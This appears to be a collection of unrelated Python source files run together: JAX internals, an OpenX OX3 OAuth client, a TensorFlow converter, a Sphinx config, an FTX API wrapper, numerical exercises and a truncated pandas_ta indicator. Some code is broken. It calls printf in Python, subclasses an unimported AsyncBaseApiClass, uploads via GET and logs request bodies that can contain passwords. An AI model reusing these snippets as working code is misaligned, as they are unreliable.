return format(self._value[()], format_spec)
else:
return format(self._value, format_spec)
setattr(device_array, "__format__", __format__)
def __array__(self, dtype=None, context=None):
return np.asarray(self._value, dtype=dtype)
setattr(device_array, "__array__", __array__)
setattr(device_array, "__str__", partialmethod(_forward_to_value, str))
setattr(device_array, "__bool__", partialmethod(_forward_to_value, bool))
setattr(device_array, "__nonzero__", partialmethod(_forward_to_value, bool))
setattr(device_array, "__float__", lambda self: self._value.__float__())
setattr(device_array, "__int__", lambda self: self._value.__int__())
setattr(device_array, "__complex__", lambda self: self._value.__complex__())
setattr(device_array, "__hex__", partialmethod(_forward_to_value, hex))
setattr(device_array, "__oct__", partialmethod(_forward_to_value, oct))
setattr(device_array, "__index__", partialmethod(_forward_to_value, op.index))
to_bytes = lambda self, order="C": self._value.tobytes(order)
setattr(device_array, "tobytes", to_bytes)
del to_bytes
setattr(device_array, "tolist", lambda self: self._value.tolist())
# pickle saves and loads just like an ndarray
setattr(device_array, "__reduce__",
partialmethod(_forward_to_value, op.methodcaller("__reduce__")))
# explicitly set to be unhashable.
setattr(device_array, "__hash__", None)
# clobbered when jax.numpy is imported, but useful in tests
setattr(device_array, "__eq__", lambda self, other: self._value == other)
# The following methods are dynamically overridden in lax_numpy.py.
def raise_not_implemented():
raise NotImplementedError
setattr(device_array, "__getitem__", lambda self, i: raise_not_implemented())
# pylint: enable=protected-access
class DeletedBuffer(object): pass
deleted_buffer = DeletedBuffer()
for device_array in [_CppDeviceArray, _DeviceArray]:
core.literalable_types.add(device_array)
core.pytype_aval_mappings[device_array] = ConcreteArray
pytype_aval_mappings[device_array] = op.attrgetter('aval')
canonicalize_dtype_handlers[device_array] = identity
def _device_array_constant_handler(c, val, canonicalize_types=True):
return xb.constant_general(c, val.device_buffer.to_py())
xb.register_constant_handler(_DeviceArray, _device_array_constant_handler)
xb.register_constant_handler(_CppDeviceArray, _device_array_constant_handler)
def _device_put_device_array(x: Union[DeviceArrayProtocol, _DeviceArray], device: Optional[Device]):
x = _copy_device_array_to_device(x, device)
return (x.device_buffer,)
device_put_handlers[_CppDeviceArray] = _device_put_device_array
device_put_handlers[_DeviceArray] = _device_put_device_array
def _copy_device_array_to_device(x: Union[DeviceArrayProtocol, _DeviceArray], device: Optional[xc.Device]) -> Union[DeviceArrayProtocol, _DeviceArray]:
if device is None:
# no copying to be done because there's no target specified
return x
elif xb.get_device_backend(device).platform == x.device_buffer.platform():
# source and target platforms are the same
if x.device_buffer.device() == device:
# no copying to be done because source equals target
if x._device == device:
return x
else:
moved_buf = x.device_buffer # We need to change stickyness
else:
# move the buffer with a device-to-device copy
moved_buf = x.device_buffer.copy_to_device(device)
else:
# buffers from different XLA backends are passed through the host.
backend = xb.get_device_backend(device)
moved_buf = backend.buffer_from_pyval(x.device_buffer.to_py(), device)
return make_device_array(x.aval, device, moved_buf)
def _device_put_impl(x, device: Optional[Device] = None):
if type_is_device_array(x):
return _copy_device_array_to_device(x, device)
try:
a = abstractify(x)
except TypeError as err:
raise TypeError(
f"Argument '{x}' of type {type(x)} is not a valid JAX type") from err
return aval_to_result_handler(device, a)(*device_put(x, device))
device_put_p = core.Primitive('device_put')
device_put_p.def_impl(_device_put_impl)
device_put_p.def_abstract_eval(lambda x, device=None: x)
translations[device_put_p] = lambda c, x, device=None: x
ad.deflinear2(device_put_p, lambda cotangent, _, **kwargs: [cotangent])
masking.defvectorized(device_put_p)
def _zeros(c, xla_shape):
if xla_shape.is_array():
shape, dtype = xla_shape.dimensions(), xla_shape.numpy_dtype()
zero = xb.constant(c, np.array(0, dtype=dtype))
return xops.Broadcast(zero, shape)
else:
# It is a token
return xops.CreateToken(c)
def _remat_using_cond(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr):
"""Lower remat to a Conditional which always returns true. This:
1. Circumvents common subexpression elimination.
2. In common case of `jax.grad(jax.remat(f))`, ensures the remat blocks
occur after the primal blocks, because cotangent is an input to the
Conditional."""
# Fake condition which always selects True branch.
rng = xops.RngUniform(xb.constant(c, np.array(0, dtype=np.float32)),
xb.constant(c, np.array(1, dtype=np.float32)),
xc.Shape.array_shape(xc.PrimitiveType.F32, []))
pred = xops.Lt(rng, xb.constant(c, np.array(2, dtype=np.float32)))
true_op = xops.Tuple(c, in_nodes)
remat_subc = xb.make_computation_builder("remat_call_subcomputation")
input_op = xb.parameter(remat_subc, 0, c.get_shape(true_op), replicated=[])
args = xla_destructure(remat_subc, input_op)
out_nodes = jaxpr_subcomp(remat_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, 'remat')),
*args)
out_node_shapes = [remat_subc.get_shape(o) for o in out_nodes]
remat_subc = remat_subc.build(xops.Tuple(remat_subc, out_nodes))
false_op = true_op
dummy_subc = xb.make_computation_builder("remat_call_dummy_subcomputation")
xb.parameter(dummy_subc, 0, c.get_shape(false_op), replicated=[])
out_nodes = [_zeros(dummy_subc, s) for s in out_node_shapes]
dummy_subc = dummy_subc.build(xops.Tuple(dummy_subc, out_nodes))
return xops.Conditional(pred, true_op, remat_subc, false_op, dummy_subc)
def _remat_using_while(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr):
"""Lower remat to a single iteration while loop."""
# Dummy subc for getting subcomp shapes.
dummy_inputs = xops.Tuple(c, in_nodes)
dummy_subc = xb.make_computation_builder("remat_dummy_subcomputation")
dummy_input_op = xb.parameter(dummy_subc, 0, c.get_shape(dummy_inputs), replicated=[])
dummy_args = xla_destructure(dummy_subc, dummy_input_op)
dummy_subcomp_outs = jaxpr_subcomp(
dummy_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, "remat")), *dummy_args)
out_node_shapes = [dummy_subc.get_shape(o) for o in dummy_subcomp_outs]
i_init = xb.constant(c, np.array(0, dtype=np.int32))
zeros_like_outs = [_zeros(c, s) for s in out_node_shapes]
inputs = xops.Tuple(c, [i_init] + in_nodes + zeros_like_outs)
cond_subc = xb.make_computation_builder("remat_cond_subcomputation")
input_op = xb.parameter(cond_subc, 0, c.get_shape(inputs), replicated=[])
i = xops.GetTupleElement(input_op, 0)
rng = xops.RngUniform(xb.constant(cond_subc, np.array(1, dtype=np.int32)),
xb.constant(cond_subc, np.array(2, dtype=np.int32)),
xc.Shape.array_shape(xc.PrimitiveType.S32, []))
cond_subc = cond_subc.build(xops.Lt(i, rng))
body_subc = xb.make_computation_builder("remat_body_subcomputation")
input_op = xb.parameter(body_subc, 0, c.get_shape(inputs), replicated=[])
i, *args = xla_destructure(body_subc, input_op)[:len(in_nodes)+1]
i_next = xops.Add(i, xb.constant(body_subc, np.array(1, dtype=np.int32)))
subcomp_outs = jaxpr_subcomp(
body_subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, "remat")), *args)
out_nodes = [i_next] + args + subcomp_outs
body_subc = body_subc.build(xops.Tuple(body_subc, out_nodes))
outs = xops.While(cond_subc, body_subc, inputs)
return xops.Tuple(c, xla_destructure(c, outs)[len(in_nodes)+1:])
def _remat_translation_rule(c, axis_env, in_nodes,
name_stack, backend, name, call_jaxpr,
prevent_cse, differentiated, concrete, device=None):
del device, concrete # Unused.
if differentiated and prevent_cse:
if backend == "gpu":
return _remat_using_while(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr)
else:
return _remat_using_cond(
c, axis_env, in_nodes, name_stack, backend, name, call_jaxpr)
else:
outs = jaxpr_subcomp(c, call_jaxpr, backend, axis_env, (), "", *in_nodes)
return xops.Tuple(c, outs)
call_translations[pe.remat_call_p] = _remat_translation_rule # type: ignore
ad.primitive_transposes[core.named_call_p] = partial(ad.call_transpose,
core.named_call_p)
def _named_call_translation_rule(c, axis_env, in_nodes, name_stack, *,
name="core_call", backend, call_jaxpr):
subc = xb.make_computation_builder(name)
args = [xb.parameter(subc, i, c.GetShape(n)) for i, n in enumerate(in_nodes)]
out_nodes = jaxpr_subcomp(subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, name), *args)
subc = subc.Build(xops.Tuple(subc, out_nodes))
return xops.Call(c, subc, list(in_nodes))
call_translations[core.named_call_p] = _named_call_translation_rule
def _call_translation_rule(c, axis_env, in_nodes, name_stack, *, backend,
call_jaxpr):
return _named_call_translation_rule(
c, axis_env, in_nodes, name_stack, name="core_call",
backend=backend, call_jaxpr=call_jaxpr)
call_translations[core.call_p] = _call_translation_rule
|
from .commandroute import CommandRoute
from .documentroute import DocumentRoute
from .imageroute import ImageRoute
from .messageroute import MessageRoute
|
# -*- coding: utf-8 -*-
from six.moves import configparser as ConfigParser
from six.moves import http_cookiejar as cookielib
import logging
import mimetypes
from pprint import pformat
import random
import json
from six.moves.urllib.parse import parse_qs, urlparse
import requests
from requests_oauthlib import OAuth1
__version__ = '0.6.1'
REQUEST_TOKEN_URL = 'https://sso.openx.com/api/index/initiate'
ACCESS_TOKEN_URL = 'https://sso.openx.com/api/index/token'
AUTHORIZATION_URL = 'https://sso.openx.com/login/process'
API_PATH_V1 = '/ox/3.0'
API_PATH_V2 = '/ox/4.0'
API_PATH_SSO = '/api'
ODS_PATH_V1 = '/data/1.0'
ACCEPTABLE_PATHS = (API_PATH_V1, API_PATH_V2, API_PATH_SSO, ODS_PATH_V1)
JSON_PATHS = (API_PATH_V2,ODS_PATH_V1)
HTTP_METHOD_OVERRIDES = ['DELETE', 'PUT', 'OPTIONS']
class UnknownAPIFormatError(ValueError):
"""Client is passed an unrecognized API path that it cannot handle."""
pass
class OAuthException(Exception):
"""Client encountered an Oauth error."""
pass
class Client(object):
"""Client for making requests to the OX3 API. Maintains
authentication and points all requests at a domain+path
combination. Handles request and response data in the form
of Python dictionaries, translated to and from the JSON and
query string encoding the API itself uses.
"""
def __init__(self, domain, realm, consumer_key, consumer_secret,
callback_url='oob',
scheme='http',
request_token_url=REQUEST_TOKEN_URL,
access_token_url=ACCESS_TOKEN_URL,
authorization_url=AUTHORIZATION_URL,
api_path=API_PATH_V1,
email=None,
password=None,
http_proxy=None,
https_proxy=None,
headers=None,
timeout=None):
"""
domain -- Your UI domain. The API is accessed off this domain.
realm -- This is no longer used. Just specify None.
consumer_key -- Your consumer key.
consumer_secret -- Your consumer secret.
callback_url -- Callback URL to redirect to on successful authorization.
We default to 'oob' for headless login.
request_token -- Only override for debugging.
access_token -- Only override for debugging.
authorization_url -- Only override for debugging.
api_path -- Only override for debugging.
http_proxy -- Optional proxy to send HTTP requests through.
headers -- list of headers to send with the request
timeout -- http request timeout in seconds.
"""
self.domain = domain
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.callback_url = callback_url
self.scheme = scheme
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
self.api_path = api_path
self.timeout = timeout
# Validate API path:
if api_path not in ACCEPTABLE_PATHS:
msg = '"{}" is not a recognized API path.'.format(api_path)
msg += '\nLegal paths include:'
for i in ACCEPTABLE_PATHS:
msg += '\n{}'.format(i)
raise UnknownAPIFormatError(msg)
# These get cleared after log on attempt.
self._email = email
self._password = password
# You shouldn't need to access the token and session objects directly so we'll keep them private.
self._token = None
self._session = requests.Session()
# set supplied headers and proxies
if headers:
self._session.headers.update(headers)
if http_proxy:
self._session.proxies.update({'http': http_proxy})
if https_proxy:
self._session.proxies.update({'https': https_proxy})
self.logger = logging.getLogger(__name__)
def log_request(self, response):
self.logger.debug('====={0:=<45}'.format('OX3 api call started'))
self.logger.debug("%s %s" % (response.request.method, response.request.url))
self.logger.debug('====={0:=<45}'.format('OX3 api call request headers'))
for k, v in response.request.headers.items():
self.logger.debug("%s: %s" % (k, v))
self.logger.debug('====={0:=<45}'.format('OX3 api call request body'))
self.logger.debug("%s" % response.request.body)
self.logger.debug('====={0:=<45}'.format('OX3 api call response headers'))
for k, v in response.headers.items():
self.logger.debug("%s: %s" % (k, v))
self.logger.debug('====={0:=<45}'.format('OX3 api call response body'))
try:
self.logger.debug(pformat(json.loads(response.text)))
except ValueError:
self.logger.debug("%s" % response.text)
self.logger.debug('====={0:=<45}'.format('OX3 api call finished'))
def request(self, url, method='GET', headers=None, data=None, sign=False,
send_json=False):
"""Helper method to make a (optionally OAuth signed) HTTP request."""
if headers is None:
headers = {}
if sign:
oauth = OAuth1(client_key=self.consumer_key,
resource_owner_key=self._token,
callback_uri=self.callback_url,
signature_type='query')
else:
oauth = None
if send_json:
response = self._session.request(method, self._resolve_url(url), headers=headers,
json=data, auth=oauth, timeout=self.timeout)
else:
response = self._session.request(method, self._resolve_url(url), headers=headers,
data=data, auth=oauth, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return response
def fetch_request_token(self):
"""Helper method to fetch and set request token.
Returns token string.
"""
oauth = OAuth1(client_key=self.consumer_key,
client_secret=self.consumer_secret,
callback_uri=self.callback_url,
signature_type='auth_header')
response = self._session.post(url=self.request_token_url, auth=oauth, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth token request failed (%s) %s" % (response.status_code, response.text))
credentials = parse_qs(response.text)
self._token = {'key': credentials['oauth_token'][0],
'secret': credentials['oauth_token_secret'][0]}
return self._token
def authorize_token(self, email=None, password=None):
"""Helper method to authorize."""
# Give precedence to credentials passed in methods calls over those set
# in the instance. This allows you to override user creds that may have
# been loaded from a file.
if not email:
email = self._email
if not password:
password = self._password
if not email or not password:
raise Exception('Missing email or password')
data = {
'email': email,
'password': password,
'oauth_token': self._token['key']}
response = self._session.post(url=self.authorization_url, data=data, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth login failed (%s) %s" % (response.status_code, response.text))
# set token verifier
self._token['verifier'] = parse_qs(response.text)['oauth_verifier'][0]
def fetch_access_token(self):
"""Helper method to fetch and set access token.
Returns token string.
"""
oauth = OAuth1(client_key=self.consumer_key,
client_secret=self.consumer_secret,
resource_owner_key=self._token['key'],
resource_owner_secret=self._token['secret'],
verifier=self._token['verifier'],
callback_uri=self.callback_url,
signature_type='auth_header')
response = self._session.post(url=self.access_token_url, auth=oauth, timeout=self.timeout)
self.log_request(response)
if response.status_code != 200:
raise OAuthException("OAuth token verification failed (%s) %s" % (response.status_code, response.text))
self._token = parse_qs(response.text)['oauth_token'][0]
return self._token
def validate_session(self):
"""Validate an API session."""
# We need to store our access token as the openx3_access_token cookie.
# This cookie will be passed to all future API requests.
cookie = cookielib.Cookie(
version=0,
name='openx3_access_token',
value=self._token,
port=None,
port_specified=False,
domain=self.domain,
domain_specified=True,
domain_initial_dot=False,
path='/',
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest={})
self._session.cookies.set_cookie(cookie)
# v2 doesn't need this extra step, just the cookie:
if self.api_path == API_PATH_V1:
response = self._session.put(url=self._resolve_url('/a/session/validate'), timeout=self.timeout)
self.log_request(response)
return response.text
def logon(self, email=None, password=None):
"""Returns self after authentication.
Single call to complete OAuth login process.
Keyword arguments:
email -- user email address.
password -- user password.
"""
self.fetch_request_token()
self.authorize_token(email=email, password=password)
self.fetch_access_token()
self.validate_session()
return self
def logoff(self):
"""Returns self after deleting authenticated session."""
if self.api_path == API_PATH_V1:
response = self._session.delete(self._resolve_url('/a/session'), timeout=self.timeout)
elif self.api_path == API_PATH_V2:
response = self._session.delete(self._resolve_url('/session'), timeout=self.timeout)
elif self.api_path == API_PATH_SSO:
oauth = OAuth1(client_key=self.consumer_key,
resource_owner_key=self._token,
callback_uri=self.callback_url,
signature_type='query')
response = self._session.delete(url=self.access_token_url, auth=oauth, timeout=self.timeout)
if response.status_code != 204:
raise OAuthException("OAuth token deletion failed (%s) %s" % (response.status_code, response.text))
else:
raise UnknownAPIFormatError(
'Unrecognized API path: %s' % self.api_path)
self.log_request(response)
return self
def _resolve_url(self, url):
"""Converts an API path shorthand into a full URL unless
given a full url already.
"""
parse_res = urlparse(url)
# 2.4 returns a tuple instead of ParseResult. Since ParseResult is a
# subclass or tuple we can access URL components similarly across
# 2.4 - 2.7. Yay!
# If there is no scheme specified we create a fully qualified URL.
if not parse_res[0]:
url = '%s://%s%s%s' % (self.scheme, self.domain, self.api_path,
parse_res[2])
if parse_res[4]:
url = url + '?' + parse_res[4]
return url
def _response_value(self, response):
""" Utility method. Returns decoded json. If the response content cannot be decoded, then
the text is returned.
"""
try:
return response.json()
except ValueError:
return response.text
def get(self, url, params=None):
"""Issue a GET request to the given URL or API shorthand
"""
response = self._session.get(self._resolve_url(url), params=params, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def options(self, url):
"""Send a request with HTTP method OPTIONS to the given
URL or API shorthand.
OX3 v2 uses this method for showing help information.
"""
response = self._session.options(self._resolve_url(url), timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def put(self, url, data=None):
"""Issue a PUT request to url (either a full URL or API
shorthand) with the data.
"""
if self.api_path in JSON_PATHS:
response = self._session.put(self._resolve_url(url), data=json.dumps(data), timeout=self.timeout)
else:
response = self._session.put(self._resolve_url(url), data=data, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def post(self, url, data=None):
"""Issue a POST request to url (either a full URL or API
shorthand) with the data.
"""
if self.api_path in JSON_PATHS:
response = self._session.post(self._resolve_url(url), data=json.dumps(data), timeout=self.timeout)
else:
response = self._session.post(self._resolve_url(url), data=data, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def delete(self, url):
"""Issue a DELETE request to the URL or API shorthand."""
response = self._session.delete(self._resolve_url(url))
self.log_request(response)
response.raise_for_status()
# Catch no content responses from some delete actions.
if response.status_code == 204:
return []
return self._response_value(response)
def upload_creative(self, account_id, file_path):
"""Upload a media creative to the account with ID
account_id from the local file_path.
"""
# Thanks to nosklo for his answer on SO:
# http://stackoverflow.com/a/681182
boundary = '-----------------------------' + str(int(random.random() * 1e10))
parts = []
# Set account ID part.
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="account_id"')
parts.append('')
parts.append(str(account_id))
# Set creative contents part.
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="userfile"; filename="%s"' % file_path)
parts.append('Content-Type: %s' % mimetypes.guess_type(file_path)[0] or 'application/octet-stream')
parts.append('')
# TODO: catch errors with opening file.
with open(file_path, 'r') as f:
parts.append(f.read())
parts.append('--' + boundary + '--')
parts.append('')
body = '\r\n'.join(parts)
# TODO: Catch errors in attempt to upload.
headers = {'content-type': 'multipart/form-data; boundary=' + boundary}
if self.api_path == API_PATH_V1:
url = self._resolve_url('/a/creative/uploadcreative')
elif self.api_path == API_PATH_V2:
url = self._resolve_url('/creative/uploadcreative')
else:
raise UnknownAPIFormatError(
'Unrecognized API path: %s' % self.api_path)
response = self._session.get(url, headers=headers, data=body, timeout=self.timeout)
self.log_request(response)
response.raise_for_status()
return self._response_value(response)
def client_from_file(file_path='.ox3rc', env=None):
"""Return an instance of ox3apiclient.Client with data from file_path.
Keyword arguments:
file_path -- the file to load. Default is '.ox3rc' form current dir.
env -- the env section to load. Default will be first env section.
"""
cp = ConfigParser.RawConfigParser()
cp.read(file_path)
# Load default env if no env is specified. The default env is just the first
# env listed.
if not env:
env = [e for e in cp.get('ox3apiclient', 'envs').split('\n') if e][0]
# Required parameters for a ox3apiclient.Client instance.
required_params = [
'domain',
'consumer_key',
'consumer_secret']
client_params = {}
# Load required parameters.
try:
for param in required_params:
client_params[param] = cp.get(env, param)
except ConfigParser.NoOptionError:
err_msg = "Missing required option: '%s'" % param
raise Exception(err_msg)
client = Client(
domain=client_params['domain'],
realm=None,
consumer_key=client_params['consumer_key'],
consumer_secret=client_params['consumer_secret'])
# Load optional parameters.
optional_params = [
'callback_url',
'scheme',
'request_token_url',
'access_token_url',
'authorization_url',
'api_path',
'email',
'password',
'timeout']
for param in optional_params:
try:
prop = param
# Prefix private properties with '_'.
if prop in ['email', 'password']:
prop = '_%s' % prop
client.__dict__[prop] = cp.get(env, param)
except ConfigParser.NoOptionError:
pass
return client
# The exposed API has moved to using Client instead of OX3APIClient, but create
# a temporary alias for backwards compatibility.
OX3APIClient = Client
|
#!/usr/bin/python3
import tensorflow as tf
from tensorflow.python.platform import gfile
from google.protobuf import text_format
import sys
def convert_pbtxt_to_pb(filename):
with tf.gfile.FastGFile(filename, 'r') as f:
graph_def = tf.GraphDef()
file_content = f.read()
# Merges the human-readable string in `file_content` into `graph_def`.
text_format.Merge(file_content, graph_def)
tmp=filename.split('.')
outname=tmp[0]+".pb"
tf.train.write_graph( graph_def , './' , outname , as_text = False )
printf("usage: python3 pbtxt2pb.py xxx.pbtxt")
fname=sys.argv[1]
convert_pbtxt_to_pb(fname)
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
]
# TODO: Please Read!
# Uncomment the below if you use native CircuitPython modules such as
# digitalio, micropython and busio. List the modules you use. Without it, the
# autodoc module docs will fail to generate with a warning.
autodoc_mock_imports = ["digitalio", "busio", "adafruit_bus_device", "micropython"]
intersphinx_mapping = {
"python": ("https://docs.python.org/3.4", None),
"BusDevice": (
"https://circuitpython.readthedocs.io/projects/busdevice/en/latest/",
None,
),
"CircuitPython": ("https://circuitpython.readthedocs.io/en/latest/", None),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "Adafruit PN532 Library"
copyright = "2018 ladyada"
author = "ladyada"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "1.0"
# The full version, including alpha/beta/rc tags.
release = "1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", ".env", "CODE_OF_CONDUCT.md"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# If this is True, todo emits a warning for each TODO entries. The default is False.
todo_emit_warnings = True
napoleon_numpy_docstring = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), "."]
except:
html_theme = "default"
html_theme_path = ["."]
else:
html_theme_path = ["."]
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = "_static/favicon.ico"
# Output file base name for HTML help builder.
htmlhelp_basename = "AdafruitPn532Librarydoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"AdafruitPN532Library.tex",
"AdafruitPN532 Library Documentation",
author,
"manual",
),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
"AdafruitPN532library",
"Adafruit PN532 Library Documentation",
[author],
1,
)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"AdafruitPN532Library",
"Adafruit PN532 Library Documentation",
author,
"AdafruitPN532Library",
"One line description of project.",
"Miscellaneous",
),
]
|
import datetime as dt
from library.ftx.base import BaseApiClass
class LeveragedTokens(AsyncBaseApiClass):
"""docstring for LeveragedTokens."""
def __init__(self, api_key: str, secret_key: str, subaccount_name: str = ''):
super().__init__(api_key, secret_key, subaccount_name)
def list_leveraged_tokens(self):
""" https://docs.ftx.com/#list-leveraged-tokens """
return self.get('/api/lt/tokens', authentication_required=False)
def get_token_info(self, token_name: str):
""" https://docs.ftx.com/#get-token-info """
return self.get(f'/api/lt/{token_name}', authentication_required=False)
def get_leveraged_token_balances(self):
""" https://docs.ftx.com/#get-leveraged-token-balances """
return self.get(f'/api/lt/balances')
def list_leveraged_token_creation_requests(self):
""" https://docs.ftx.com/#list-leveraged-token-creation-requests """
return self.get(f'/api/lt/creations')
def request_leveraged_token_creation(self, token_name: str, size: float):
""" https://docs.ftx.com/#request-leveraged-token-creation """
return self.post(f'/api/lt/{token_name}/create', data={'size': size})
def list_leveraged_token_redemption_requests(self):
""" https://docs.ftx.com/#list-leveraged-token-redemption-requests """
return self.get(f'/api/lt/redemptions')
def request_leveraged_token_redemption(self, token_name: str, size: float):
""" https://docs.ftx.com/#request-leveraged-token-redemption """
return self.post(f'/api/lt/{token_name}/redeem', data={'size': size})
def request_etf_rebalance_info(self):
""" https://docs.ftx.com/#request-etf-rebalance-info """
return self.get(f'/api/etfs/rebalance_info')
|
from package import redact_ex
from package import solve_implicit_ode
import numpy as np
EXERCISE_05 = """\
Make a program that is able to graphically solve the previous equation
using the fully implicit FTCS scheme.\
"""
redact_ex(EXERCISE_05, 5)
slices = 20
itern = 1000
plot_frequency = 0.05
deltat = 1e-3
deltax = 1e-1
alpha = 1
s = alpha*deltat/deltax**2
amat = np.diag([1]+[1+2*s]*(slices-1)+[1]) \
+ np.diag([0]+[ -s]*(slices-1)+[ ], k = 1) \
+ np.diag([ ]+[ -s]*(slices-1)+[0], k = -1)
iamat = np.linalg.inv(amat)
iden = np.identity(len(amat))
def iftcs_boundary_conditions(lap, ciarr):
slices = len(ciarr)-1
ciarr[0] = 0; ciarr[slices] = 10
return ciarr
tprev = np.zeros(slices+1); tpprev = np.zeros(slices+1)
tprev[0] = 0; tpprev[0] = 0
tprev[slices] = 10; tpprev[slices] = 10
initial_conditions = [tprev, tpprev]
print("Computing...", end='\n\n')
solve_implicit_ode(iamat, iden, initial_conditions, iftcs_boundary_conditions,
slices, itern, plot_frequency)
|
import numpy as np
def to_binary(n, dim):
"""
Obtains the binary representation of an integer.
args:
n: The integer to be converted to binary. The integer shouldn't
be so large that more than dim(the next arg) bits are required
to encode it.
dim: The dimension of the array that is
going to contain the binary representation.
"""
raw = np.zeros(dim)
temp = n%(2**dim)
indx = 0
while temp > 0:
raw[indx] = temp % 2
temp = int(temp / 2)
indx = indx + 1
return raw
class GenBase():
"""
Represents an integer in a base system where the bases are not constant, but given by an array.
For example, a binary base system has bases equal to 2 while decimal has all bases equal to 10.
But what if the "units" digit had a base 3 (could take values 0,1,2) and the "tens" digit had a
base 4 (could take values 0,1,2,3) and so on.
"""
def __init__(self, base_vals):
"""
Instantiates an instance of ArrayRep class.
args:
base_vals: The values of the bases given by an array.
"""
self.bases = base_vals
self.arr_vals = np.zeros(len(base_vals))
def add_one(self):
"""
Whatever the integer value of the instance of this class currently is, add one to it.
TODO: If an integer is greater than the maximum allowable per the array, modulo it
with max permissible value.
"""
self.arr_vals[0] += 1
i = 0
while self.arr_vals[i] > self.bases[i]:
self.arr_vals[i] = 0
self.arr_vals[i+1] += 1
i+=1
def add_num(self,no):
"""
Whatever the integer value of the instance of this class currently is,
add an integer, no to it.
args:
no: The number to add.
"""
for _ in range(no):
self.add_one()
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs/include".split(';') if "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;std_msgs;geometry_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ar_track_alvar_msgs"
PROJECT_SPACE_DIR = "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs"
PROJECT_VERSION = "0.7.0"
|
# -*- coding: utf-8 -*-
from pandas import DataFrame
from .roc import roc
from pandas_ta.utils import get_drift, get_offset, verify_series
def kst(close, roc1=None, roc2=None, roc3=None, roc4=None, sma1=None, sma2=None, sma3=None, sma4=None, signal=None, drift=None, offset=None, **kwargs):
"""Indicator: 'Know Sure Thing' (KST)"""
# Validate arguments
roc1 = int(roc1) if roc1 and roc1 > 0 else 10
roc2 = int(roc2) if roc2 and roc2 > 0 else 15
roc3 = int(roc3) if roc3 and roc3 > 0 else 20
roc4 = int(roc4) if roc4 and roc4 > 0 else 30
sma1 = int(sma1) if sma1 and sma1 > 0 else 10
sma2 = int(sma2) if sma2 and sma2 > 0 else 10
sma3 = int(sma3) if sma3 and sma3 > 0 else 10
